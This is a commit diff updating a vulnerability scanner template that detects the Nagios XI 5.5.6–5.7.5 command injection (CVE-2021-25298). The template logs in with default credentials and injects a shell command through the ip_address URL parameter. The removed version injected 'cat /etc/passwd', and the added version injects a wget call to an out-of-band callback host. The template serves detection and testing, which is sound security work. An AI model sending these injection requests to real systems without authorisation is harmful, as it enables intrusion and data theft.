updated matcher,request,metadata

cves/2021/CVE-2021-25298.yaml

@@ -1,20 +1,24 @@
 id: CVE-2021-25298
 
 info:
-  name: Nagios XI 5.5.6 to 5.7.5 Command Injection
+  name: Nagios XI 5.5.6 to 5.7.5 - Command Injection
   author: k0pak4
-  severity: critical
-  description: Nagios XI versions 5.5.6 to 5.7.5 are affected by OS command injection. An authenticated user can gain code execution due to unsanitized URL paramaters.
+  severity: high
+  description: |
+    Nagios XI versions 5.5.6 to 5.7.5 are affected by OS command injection. An authenticated user can gain code execution due to unsanitized URL paramaters.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-25298
     - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
     - https://github.com/rapid7/metasploit-framework/pull/17494
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25298
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-25298
     cwe-id: CWE-78
-  tags: cve,cve2021,nagiosxi,authenticated
+  metadata:
+    verified: true
+    shodan-query: title:"Nagios XI"
+  tags: cve,cve2021,nagiosxi,rce,oast,authenticated
 
 requests:
   - raw:
@@ -26,27 +30,32 @@ requests:
         POST /nagiosxi/login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Cookie: nagiosxi={{nagiosxi}}
 
-        nsp={{nsp_token}}&pageopt=login&username=nagiosadmin&password=nagiosadmin
+        nsp={{nsp}}&pageopt=login&username=nagiosadmin&password=nagiosadmin
 
       - |
         GET /nagiosxi/index.php HTTP/1.1
         Host: {{Hostname}}
-        Cookie: nagiosxi={{nagiosxi_authed}}
 
       - |
-        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_token_authed}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20cat%20/etc/passwd%3b HTTP/1.1
+        @timeout: 20s
+        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}; HTTP/1.1
         Host: {{Hostname}}
-        Cookie: nagiosxi={{nagiosxi_authed}}
 
+    cookie-reuse: true
     matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - '<input type="hidden" name="ip_address" value="127.0.0.1; cat /etc/passwd;">'
-          - "<input type='hidden' name='ip_address' value='127.0.0.1; cat /etc/passwd;'>"
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: body_4
+        words:
+          - "Connection Information"
+          - "Host Check"
+        condition: and
 
       - type: status
         status:
@@ -54,35 +63,17 @@ requests:
 
     extractors:
       - type: regex
+        name: nsp
         part: body
-        name: nsp_token
         group: 1
-        internal: true
         regex:
-          - '<input type="hidden" name="nsp" value="(.*)">'
-          - "<input type='hidden' name='nsp' value='(.*)'>"
+          - "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
+        internal: true
 
       - type: regex
         part: body
-        name: nsp_token_authed
+        name: nsp_auth
         group: 1
-        internal: true
         regex:
-          - 'var nsp_str = "(.*)";'
-          - "var nsp_str = '(.*)';"
-
-      - type: regex
-        name: nagiosxi
-        part: header
-        group: 1
+          - "var nsp_str = ['\"](.*)['\"];"
         internal: true
-        regex:
-          - 'nagiosxi=(.*); expires'
-
-      - type: regex
-        name: nagiosxi_authed
-        part: header
-        group: 1
-        internal: true
-        regex:
-          - 'only[\s\S]*Set-Cookie: nagiosxi=(.*); expires'